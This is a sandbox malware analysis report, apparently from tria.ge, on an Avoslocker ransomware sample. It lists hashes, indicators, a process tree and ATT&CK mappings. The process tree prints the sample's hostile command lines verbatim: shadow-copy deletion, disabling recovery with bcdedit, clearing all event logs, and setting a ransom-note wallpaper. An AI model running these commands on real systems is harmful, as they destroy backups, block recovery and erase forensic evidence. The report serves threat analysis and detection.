Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
25/12/2024, 02:02
Static task
static1
Behavioral task
behavioral1
Sample
test.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
test.exe
Resource
win10v2004-20241007-en
General
-
Target
test.exe
-
Size
1.1MB
-
MD5
bc78307b49282fd1039a09c88f5e57d9
-
SHA1
56ca25bc143ec38871fa5e96561437755a9d0de9
-
SHA256
06918af465e607aa81a46042c24e6a8c45d7c983f33ee621caad6b25464dd27a
-
SHA512
af4d43f05b3583d07fb96e0815bcc5624e7e3eb110981a21ff82ec07829bcdfd3d23c7de1b673a41bfb41ac20614f27a28389aed80f75a4399c52b351ba5b5f5
-
SSDEEP
24576:u4s+oT+NXBLi0rjFXvyHBlbmCZa8Ch1972J1+i3DO2gik:uioT+NXVFjxvMBlbmya8CF4TO2K
Malware Config
Signatures
-
Avoslocker Ransomware
Avoslocker is a relatively new ransomware, that was observed in late June and early July, 2021.
-
Avoslocker family
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 3800 bcdedit.exe 3792 bcdedit.exe -
Renames multiple (10424) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI test.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Z: test.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1638129618.png" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\GET_YOUR_FILES_BACK.txt test.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\jfluid-server_ja.jar test.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.nl_ja_4.4.0.v20140623020002.jar test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18227_.WMF test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02752G.GIF test.exe File created C:\Program Files (x86)\Common Files\microsoft shared\TextConv\en-US\GET_YOUR_FILES_BACK.txt test.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\de-DE\js\settings.js test.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\base-undocked-4.png test.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\GET_YOUR_FILES_BACK.txt test.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ja_JP.jar test.exe File opened for modification C:\Program Files (x86)\Windows Media Player\es-ES\WMPDMC.exe.mui test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD02153_.WMF test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105298.WMF test.exe File opened for modification C:\Program Files\Common Files\System\msadc\es-ES\msadcer.dll.mui test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00200_.WMF test.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\STRTEDGE\STRTEDGE.INF test.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\diner_settings.png test.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-plaf_zh_CN.jar test.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\pop3.jar test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\MP00021_.WMF test.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\GRPHFLT\PNG32.FLT test.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-charts_zh_CN.jar test.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Warsaw test.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\dt.jar test.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs.xml test.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\play_rest.png test.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe AIR\Versions\1.0\digest.s test.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif test.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\INDUST\THMBNAIL.PNG test.exe File opened for modification C:\Program Files\UnblockDeny.aif test.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sampler.xml test.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\mip.exe.mui test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSSP7EN.LEX test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN044.XML test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00669_.WMF test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01748_.GIF test.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar test.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\artifacts.xml test.exe File created C:\Program Files (x86)\MSBuild\GET_YOUR_FILES_BACK.txt test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01154_.WMF test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00222_.WMF test.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Nauru test.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\GET_YOUR_FILES_BACK.txt test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384895.JPG test.exe File created C:\Program Files\Microsoft Games\Multiplayer\GET_YOUR_FILES_BACK.txt test.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\GET_YOUR_FILES_BACK.txt test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0090087.WMF test.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Bermuda test.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\ja-JP\msdaprsr.dll.mui test.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\it-IT\weather.html test.exe File created C:\Program Files\Windows Journal\ja-JP\GET_YOUR_FILES_BACK.txt test.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_ja_4.4.0.v20140623020002.jar test.exe File opened for modification C:\Program Files (x86)\Windows Media Player\it-IT\wmpnssui.dll.mui test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN011.XML test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01242_.GIF test.exe File created C:\Program Files (x86)\Common Files\microsoft shared\TRANSLAT\FRAR\GET_YOUR_FILES_BACK.txt test.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\es-ES\mshwLatin.dll.mui test.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\GET_YOUR_FILES_BACK.txt test.exe File created C:\Program Files (x86)\Microsoft Office\Office14\PUBBA\GET_YOUR_FILES_BACK.txt test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18194_.WMF test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Median.xml test.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TN00330_.WMF test.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\ja-JP\InkObj.dll.mui test.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\GET_YOUR_FILES_BACK.txt test.exe -
pid Process 1240 powershell.exe 3392 powershell.exe -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language test.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3736 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1916 test.exe 3392 powershell.exe 1240 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeTakeOwnershipPrivilege 1916 test.exe Token: SeIncreaseQuotaPrivilege 3524 WMIC.exe Token: SeSecurityPrivilege 3524 WMIC.exe Token: SeTakeOwnershipPrivilege 3524 WMIC.exe Token: SeLoadDriverPrivilege 3524 WMIC.exe Token: SeSystemProfilePrivilege 3524 WMIC.exe Token: SeSystemtimePrivilege 3524 WMIC.exe Token: SeProfSingleProcessPrivilege 3524 WMIC.exe Token: SeIncBasePriorityPrivilege 3524 WMIC.exe Token: SeCreatePagefilePrivilege 3524 WMIC.exe Token: SeBackupPrivilege 3524 WMIC.exe Token: SeRestorePrivilege 3524 WMIC.exe Token: SeShutdownPrivilege 3524 WMIC.exe Token: SeDebugPrivilege 3524 WMIC.exe Token: SeSystemEnvironmentPrivilege 3524 WMIC.exe Token: SeRemoteShutdownPrivilege 3524 WMIC.exe Token: SeUndockPrivilege 3524 WMIC.exe Token: SeManageVolumePrivilege 3524 WMIC.exe Token: 33 3524 WMIC.exe Token: 34 3524 WMIC.exe Token: 35 3524 WMIC.exe Token: SeBackupPrivilege 3368 vssvc.exe Token: SeRestorePrivilege 3368 vssvc.exe Token: SeAuditPrivilege 3368 vssvc.exe Token: SeDebugPrivilege 3392 powershell.exe Token: SeIncreaseQuotaPrivilege 3524 WMIC.exe Token: SeSecurityPrivilege 3524 WMIC.exe Token: SeTakeOwnershipPrivilege 3524 WMIC.exe Token: SeLoadDriverPrivilege 3524 WMIC.exe Token: SeSystemProfilePrivilege 3524 WMIC.exe Token: SeSystemtimePrivilege 3524 WMIC.exe Token: SeProfSingleProcessPrivilege 3524 WMIC.exe Token: SeIncBasePriorityPrivilege 3524 WMIC.exe Token: SeCreatePagefilePrivilege 3524 WMIC.exe Token: SeBackupPrivilege 3524 WMIC.exe Token: SeRestorePrivilege 3524 WMIC.exe Token: SeShutdownPrivilege 3524 WMIC.exe Token: SeDebugPrivilege 3524 WMIC.exe Token: SeSystemEnvironmentPrivilege 3524 WMIC.exe Token: SeRemoteShutdownPrivilege 3524 WMIC.exe Token: SeUndockPrivilege 3524 WMIC.exe Token: SeManageVolumePrivilege 3524 WMIC.exe Token: 33 3524 WMIC.exe Token: 34 3524 WMIC.exe Token: 35 3524 WMIC.exe Token: SeBackupPrivilege 3392 powershell.exe Token: SeSecurityPrivilege 3392 powershell.exe Token: SeBackupPrivilege 3392 powershell.exe Token: SeBackupPrivilege 3392 powershell.exe Token: SeSecurityPrivilege 3392 powershell.exe Token: SeBackupPrivilege 3392 powershell.exe Token: SeBackupPrivilege 3392 powershell.exe Token: SeSecurityPrivilege 3392 powershell.exe Token: SeBackupPrivilege 3392 powershell.exe Token: SeBackupPrivilege 3392 powershell.exe Token: SeSecurityPrivilege 3392 powershell.exe Token: SeBackupPrivilege 3392 powershell.exe Token: SeBackupPrivilege 3392 powershell.exe Token: SeSecurityPrivilege 3392 powershell.exe Token: SeBackupPrivilege 3392 powershell.exe Token: SeBackupPrivilege 3392 powershell.exe Token: SeSecurityPrivilege 3392 powershell.exe Token: SeBackupPrivilege 3392 powershell.exe Token: SeSecurityPrivilege 3392 powershell.exe -
Suspicious use of WriteProcessMemory 45 IoCs
description pid Process procid_target PID 1916 wrote to memory of 2132 1916 test.exe 32 PID 1916 wrote to memory of 2132 1916 test.exe 32 PID 1916 wrote to memory of 2132 1916 test.exe 32 PID 1916 wrote to memory of 2132 1916 test.exe 32 PID 1916 wrote to memory of 2124 1916 test.exe 33 PID 1916 wrote to memory of 2124 1916 test.exe 33 PID 1916 wrote to memory of 2124 1916 test.exe 33 PID 1916 wrote to memory of 2124 1916 test.exe 33 PID 1916 wrote to memory of 2628 1916 test.exe 34 PID 1916 wrote to memory of 2628 1916 test.exe 34 PID 1916 wrote to memory of 2628 1916 test.exe 34 PID 1916 wrote to memory of 2628 1916 test.exe 34 PID 1916 wrote to memory of 2828 1916 test.exe 35 PID 1916 wrote to memory of 2828 1916 test.exe 35 PID 1916 wrote to memory of 2828 1916 test.exe 35 PID 1916 wrote to memory of 2828 1916 test.exe 35 PID 1916 wrote to memory of 2516 1916 test.exe 36 PID 1916 wrote to memory of 2516 1916 test.exe 36 PID 1916 wrote to memory of 2516 1916 test.exe 36 PID 1916 wrote to memory of 2516 1916 test.exe 36 PID 2516 wrote to memory of 3392 2516 cmd.exe 37 PID 2516 wrote to memory of 3392 2516 cmd.exe 37 PID 2516 wrote to memory of 3392 2516 cmd.exe 37 PID 2132 wrote to memory of 3524 2132 cmd.exe 38 PID 2132 wrote to memory of 3524 2132 cmd.exe 38 PID 2132 wrote to memory of 3524 2132 cmd.exe 38 PID 2124 wrote to memory of 3736 2124 cmd.exe 39 PID 2124 wrote to memory of 3736 2124 cmd.exe 39 PID 2124 wrote to memory of 3736 2124 cmd.exe 39 PID 2628 wrote to memory of 3800 2628 cmd.exe 41 PID 2628 wrote to memory of 3800 2628 cmd.exe 41 PID 2628 wrote to memory of 3800 2628 cmd.exe 41 PID 2828 wrote to memory of 3792 2828 cmd.exe 40 PID 2828 wrote to memory of 3792 2828 cmd.exe 40 PID 2828 wrote to memory of 3792 2828 cmd.exe 40 PID 1916 wrote to memory of 1240 1916 test.exe 46 PID 1916 wrote to memory of 1240 1916 test.exe 46 PID 1916 wrote to memory of 1240 1916 test.exe 46 PID 1916 wrote to memory of 1240 1916 test.exe 46 PID 1240 wrote to memory of 1820 1240 powershell.exe 47 PID 1240 wrote to memory of 1820 1240 powershell.exe 47 PID 1240 wrote to memory of 1820 1240 powershell.exe 47 PID 1240 wrote to memory of 3308 1240 powershell.exe 48 PID 1240 wrote to memory of 3308 1240 powershell.exe 48 PID 1240 wrote to memory of 3308 1240 powershell.exe 48 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\test.exe"C:\Users\Admin\AppData\Local\Temp\test.exe"1⤵
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Windows\system32\cmd.execmd /c wmic shadowcopy delete /nointeractive2⤵
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete /nointeractive3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3524
-
-
-
C:\Windows\system32\cmd.execmd /c vssadmin.exe Delete Shadows /All /Quiet2⤵
- Suspicious use of WriteProcessMemory
PID:2124 -
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:3736
-
-
-
C:\Windows\system32\cmd.execmd /c bcdedit /set {default} recoveryenabled No2⤵
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:3800
-
-
-
C:\Windows\system32\cmd.execmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
PID:3792
-
-
-
C:\Windows\system32\cmd.execmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"2⤵
- Suspicious use of WriteProcessMemory
PID:2516 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3392
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1240 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\1638129618.png /f3⤵
- Sets desktop wallpaper using registry
PID:1820
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False3⤵PID:3308
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3368
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Windows Management Instrumentation
1Defense Evasion
Direct Volume Access
1Indicator Removal
2File Deletion
2Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1011B
MD5c92c2b70fb37f84aab38412ad9226aa8
SHA114f2e9a83285612d0a7b2c83b8f89bccfde6c154
SHA256d64639e873c0873b469cd856d1ef4bce7dc14a80fac6fe2bed9d629f05acc77f
SHA51204f9dcb3cd49909712535255b6eadd7fafcb2902bf1abd5a25e9bb5f5c4dc032611aec0a5b0ec89cd7dbc65276b935c54b906b391507d2e3e3aa65466b15f848
-
Filesize
32KB
MD51102d805d581b2642cec9945747c8968
SHA1272aa475615770fe25968fc1787353ca08c89953
SHA25659fde654769fa30863cfb5ae13b21c5adb797f59d810471ea47cf46c2f0dacc0
SHA512aa3b456f24f541a9408653984d8916ba7e6eb7c18f3e0a054f01836c4ec0bfd3c186e7369a077adef7ee73b5452b3ad87b8a3b338aebe5482171e5fdbf1b54c0
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD54675ae8a2efa6580ccba58146a123222
SHA1d911de54753a24903ac497fa0e2666564707c6c2
SHA25678ac97fe1f5308e841ffae6369fbeff6c3560fb9246a7d00ecb3e94879da0a7d
SHA512f0fba8c628567ddd9c7683c06939d15531a772db51a5ac0584ab3d5fdf910c27a6f99320f5cf2cf7844d56da72dfe8c0bf0fa5fc5fed451f189fefdfb906b3d0
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\R35F5XS3MA55EO9W72NE.temp
Filesize7KB
MD576749c8b341b10562c938a226b3ff25f
SHA18db1fc670821165e1f32e801eb7767c5bb18513a
SHA2565626950a97b8b88e55c065bb66032ce2e0b906f9da5e05c81e2bc5fb6639875d
SHA51225f89d72ce35f87a1994c635db50611a435371c79166db8cbbaa8dbafe07c94a3ba8d8f34aa728424a19553ab887c3a33fd2720f65b90ec3054effaa52348cf1